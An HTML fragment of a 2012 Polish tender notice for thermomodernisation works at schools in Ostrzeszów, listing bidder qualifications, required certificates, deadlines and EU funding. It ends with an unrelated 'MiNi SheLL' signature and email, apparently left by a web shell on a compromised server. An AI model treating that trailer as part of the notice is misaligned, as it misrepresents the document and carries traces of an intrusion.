<ul class="kh_indent_1"><li><p>Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca winien wykazać, że wykonał minimum jedną realizację - robotę budowlaną tj. wykonał zamówienie polegające na wykonaniu zbliżonych robót budowlanych w zakresie odpowiadającym przedmiotowi zamówienia obejmującym wartość minimum 500.000 zł.brutto; przez pojęcie (zbliżonych robót budowlanych) zamawiający rozumie wykonanie robót budowlanych m.in. termomodernizacyjnych i im towarzyszących bez konieczności wykazania robót typu instalacji solarnych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; 
Należy przedstawić:
-informacje na temat osoby - kierownika robót z uprawnieniami budowlanymi w specjalności konstrukcyjno - budowlanej w zakresie wykonawstwa; 
-informacje na temat osoby - kierownika robót z uprawnieniami budowlanymi w specjalności sieci instalacji i urządzeń sanitarnych w zakresie wykonawstwa; 
wskazani kierownicy robót poszczególnych branż winni mieć doświadczenie w sprawowaniu tej funkcji minimum 5 lat od uzyskania uprawnień;
b)	Oświadczenia, że osoby - kierownicy robót, wskazani w wykazie którzy będą uczestniczyć                                 w wykonywaniu zamówienia posiadają wymagane uprawnienia określone odrębnymi przepisami; 
c)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, robotników i wykwalifikowanych pracowników ogólnobudowlanych - wyznaczonych bezpośrednio tylko i wyłącznie do realizacji wskazanego zadania w okresie umownym. Należy wykazać min. 10 osób-pracowników wykwalifikowanych w zawodach umożliwiających wykonanie przedmiotowego zamówienia - dla każdego zadania odrębnie, tj. dla zadania nr 1 = 10 osób-pracowników i-lub dla zadania nr 2 = 10 osób-pracowników. Spośród wskazanych osób należy wskazać brygadzistę robót.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia; Wykonawcy winni udokumentować, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 500.000 zł.; 
b)	Informacji  banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;  Wykonawcy winni udokumentować, że znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a zwłaszcza wykażą, że bank lub spółdzielcza kasa oszczędnościowo-kredytowa, w których posiadają rachunek potwierdzi wysokość posiadanych środków finansowych lub ich zdolność kredytową na łączną kwotę co najmniej 1.000.000 zł.;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1	Formularz ofertowy  (wg wzoru zał. nr 1 i zał. 1a i-lub 1b); zgodnie z opisem sposobu obliczenia ceny podanym w pkt XII siwz.
2	Dokument dowodu wniesienia wadium. 
3	W przypadku wspólnego ubiegania się o udzielenie zamówienia dwóch lub więcej podmiotów - wykonawców, należy złożyć pełnomocnictwo upoważnionych przez wykonawców osoby lub osób do składania oferty wspólnie, reprezentowania ich w postępowaniu o udzielenie zamówienia i podpisania umowy o wykonanie zamówienia. Pełnomocnictwo niniejsze winno być podpisane przez prawnie upoważnione do tego osoby w poszczególnych podmiotach.
4	Kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej wraz ze szczegółowym zestawieniem                 rzeczowo - cenowym materiałów budowlanych i urządzeń przeznaczonych do wbudowania; 
5	Harmonogram Rzeczowo - Finansowy realizacji zamówienia tj. III i IV kw. 2012 r. (wg wzoru zał. nr 12);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrzeszow.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.ostrzeszow.nowoczesnagmina.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2012 godzina 09:00, miejsce: Zakład Obsługi Placówek Oświatowych, ul. Zamkowa 31, 63-500 Ostrzeszów, pok. 79.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> postępowanie realizowane 
w związku z projektem 
pn. Termomodernizacja budynku Szkoły Podstawowej nr 1 i Gimnazjum nr 1
 oraz budynku Szkoły Podstawowej nr 2 w Ostrzeszowie 
nr UDA-RPWP.03.02.02-30-001-11-00
współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach:
Priorytetu III. Środowisko Przyrodnicze
Działania 3.2 Infrastruktura energetyczna przyjazna środowisku
Schematu 2 
Termomodernizacja obiektów użyteczności publicznej, w tym system grzewczy
 Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty ogólnobudowlane związane z termomodernizacją budynku Szkoły Podstawowej nr 1 i Gimnazjum nr 1 w Ostrzeszowie przy ul. Łąkowej 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z wcześniejszym opisem i kodami CPV.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.10.00-3, 45.11.10.00-8, 45.32.10.00-3, 45.26.10.00-4, 45.26.10.00-4, 45.31.12.00-2, 45.42.11.30-4, 34.95.33.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty ogólnobudowlane związane z termomodernizacją budynku Szkoły Podstawowej nr 2 w Ostrzeszowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z wcześniejszym opisem i kodami CPV.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.10.00-3, 45.26.10.00-4, 45.42.11.30-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com